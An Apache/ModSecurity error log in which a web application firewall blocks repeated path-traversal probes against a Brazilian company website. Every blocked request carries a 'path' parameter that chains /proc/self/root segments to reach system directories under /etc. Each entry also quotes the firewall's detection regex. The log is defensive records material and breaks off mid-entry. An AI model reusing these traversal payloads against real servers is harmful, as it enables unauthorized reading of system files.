[Fri Mar 20 04:33:08.243223 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:39138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4MzJ3M9BSuKP7CAbpQAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:33:25.240289 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.243.128:43562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4RTJ3M9BSuKP7CAbpYwAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:33:26.450483 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.241.31:47038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4Rrninkcc-iUj5Ao2LQAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:33:30.352476 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:58814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4SgF0L0L-SsrnPo5AcwAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 04:33:30.420736 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:47246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4Sta6ubjKNq_cu4angwAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:33:45.130422 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.243.128:39952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4WfqxLDW4GITHUkS6uQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:34:14.671086 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:39878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4dta6ubjKNq_cu4anyAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:34:19.445041 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:47258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4exCii7xarUs8iHY-KwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:20.751621 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:36850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4fBCii7xarUs8iHY-LgAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:28.640365 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.243.128:54284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4hAF0L0L-SsrnPo5AswAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:34:28.640878 2026] [mime_magic:error] [pid 31215:tid 140411548894976] (70014)End of file found: [client 74.7.243.128:54284] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:34:28.711853 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:36866] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4hDJ3M9BSuKP7CAbpmwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:30.633712 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:34930] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4hta6ubjKNq_cu4anzwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 04:34:31.019295 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:58140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4hzJ3M9BSuKP7CAbpoQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:37.779270 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.241.31:58144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4jQF0L0L-SsrnPo5A0gAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:39.067161 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.241.31:59310] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4j_HIg5MgXLBnicPThwAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:44.810396 2026] [mime_magic:error] [pid 11642:tid 140411574073088] (70014)End of file found: [client 74.7.241.31:59314] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/udev
[Fri Mar 20 04:34:45.718122 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:59330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4leoXxyEfFpUF8f9bZQAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:47.379769 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:34940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4lwF0L0L-SsrnPo5A4AAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 04:34:55.251305 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:52242] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4nxCii7xarUs8iHY-RwAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:56.574242 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.241.31:52252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4oBCii7xarUs8iHY-TAAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:34:58.934847 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.241.31:49316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abz4ovHIg5MgXLBnicPTkAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 04:35:04.050994 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:49322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 